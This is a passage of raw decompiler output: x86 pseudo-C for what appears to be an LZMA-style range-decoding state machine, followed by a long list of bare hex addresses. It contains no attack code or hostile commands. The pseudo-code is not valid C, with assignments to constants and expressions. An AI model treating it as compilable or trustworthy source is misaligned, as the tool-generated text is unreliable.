								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                    0x00000000
                                                                                                                    0x00406520
                                                                                                                    0x00406520
                                                                                                                    0x00406524
                                                                                                                    0x004065db
                                                                                                                    0x004065de
                                                                                                                    0x004065ea
                                                                                                                    0x004064cb
                                                                                                                    0x004064cb
                                                                                                                    0x004064ce
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x004068b6
                                                                                                                    0x004068b6
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x00406891
                                                                                                                    0x00406891
                                                                                                                    0x00406895
                                                                                                                    0x00406a44
                                                                                                                    0x00000000
                                                                                                                    0x00406a44
                                                                                                                    0x004068a1
                                                                                                                    0x004068a8
                                                                                                                    0x004068b0
                                                                                                                    0x004068b3
                                                                                                                    0x00000000
                                                                                                                    0x004068b3
                                                                                                                    0x0040652a
                                                                                                                    0x0040652e
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a72
                                                                                                                    0x00406a76
                                                                                                                    0x00406a76
                                                                                                                    0x00406534
                                                                                                                    0x0040653a
                                                                                                                    0x0040653d
                                                                                                                    0x00406541
                                                                                                                    0x00406544
                                                                                                                    0x00406548
                                                                                                                    0x00406a0e
                                                                                                                    0x00406a5a
                                                                                                                    0x00406a62
                                                                                                                    0x00406a69
                                                                                                                    0x00406a6b
                                                                                                                    0x00000000
                                                                                                                    0x00406a6b
                                                                                                                    0x0040654e
                                                                                                                    0x00406551
                                                                                                                    0x00406557
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x0040655c
                                                                                                                    0x0040655f
                                                                                                                    0x00406562
                                                                                                                    0x00406565
                                                                                                                    0x00406568
                                                                                                                    0x0040656b
                                                                                                                    0x0040656c
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x00406571
                                                                                                                    0x00406574
                                                                                                                    0x00406577
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657d
                                                                                                                    0x0040657f
                                                                                                                    0x0040657f
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406061
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00000000
                                                                                                                    0x00406072
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040607b
                                                                                                                    0x0040607e
                                                                                                                    0x00406081
                                                                                                                    0x00406085
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040608b
                                                                                                                    0x0040608e
                                                                                                                    0x00406090
                                                                                                                    0x00406091
                                                                                                                    0x00406094
                                                                                                                    0x00406096
                                                                                                                    0x00406097
                                                                                                                    0x00406099
                                                                                                                    0x0040609c
                                                                                                                    0x004060a1
                                                                                                                    0x004060a6
                                                                                                                    0x004060af
                                                                                                                    0x004060c2
                                                                                                                    0x004060c5
                                                                                                                    0x004060d1
                                                                                                                    0x004060f9
                                                                                                                    0x004060fb
                                                                                                                    0x00406109
                                                                                                                    0x00406109
                                                                                                                    0x0040610d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060fd
                                                                                                                    0x00406100
                                                                                                                    0x00406101
                                                                                                                    0x00406101
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060d7
                                                                                                                    0x004060dc
                                                                                                                    0x004060dc
                                                                                                                    0x004060e5
                                                                                                                    0x004060ed
                                                                                                                    0x004060f0
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x00406113
                                                                                                                    0x00406113
                                                                                                                    0x00406117
                                                                                                                    0x004069c3
                                                                                                                    0x00000000
                                                                                                                    0x004069c3
                                                                                                                    0x00406120
                                                                                                                    0x00406130
                                                                                                                    0x00406133
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406139
                                                                                                                    0x0040613d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x00406145
                                                                                                                    0x0040616f
                                                                                                                    0x00406175
                                                                                                                    0x0040617c
                                                                                                                    0x00000000
                                                                                                                    0x0040617c
                                                                                                                    0x0040614b
                                                                                                                    0x0040614e
                                                                                                                    0x00406153
                                                                                                                    0x00406153
                                                                                                                    0x0040615e
                                                                                                                    0x00406166
                                                                                                                    0x00406169
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061ae
                                                                                                                    0x004061b4
                                                                                                                    0x004061b7
                                                                                                                    0x004061c4
                                                                                                                    0x004061cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406183
                                                                                                                    0x00406183
                                                                                                                    0x00406187
                                                                                                                    0x004069d2
                                                                                                                    0x00000000
                                                                                                                    0x004069d2
                                                                                                                    0x00406193
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x004061a1
                                                                                                                    0x004061a4
                                                                                                                    0x004061a7
                                                                                                                    0x004061ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061d4
                                                                                                                    0x004061d6
                                                                                                                    0x004061d9
                                                                                                                    0x0040624a
                                                                                                                    0x0040624d
                                                                                                                    0x00406250
                                                                                                                    0x00406257
                                                                                                                    0x00406261
                                                                                                                    0x00000000
                                                                                                                    0x00406261
                                                                                                                    0x004061db
                                                                                                                    0x004061df
                                                                                                                    0x004061e2
                                                                                                                    0x004061e4
                                                                                                                    0x004061e7
                                                                                                                    0x004061ea
                                                                                                                    0x004061ec
                                                                                                                    0x004061ef
                                                                                                                    0x004061f1
                                                                                                                    0x004061f6
                                                                                                                    0x004061f9
                                                                                                                    0x004061fc
                                                                                                                    0x00406200
                                                                                                                    0x00406207
                                                                                                                    0x0040620a
                                                                                                                    0x00406211
                                                                                                                    0x00406215
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x0040620c
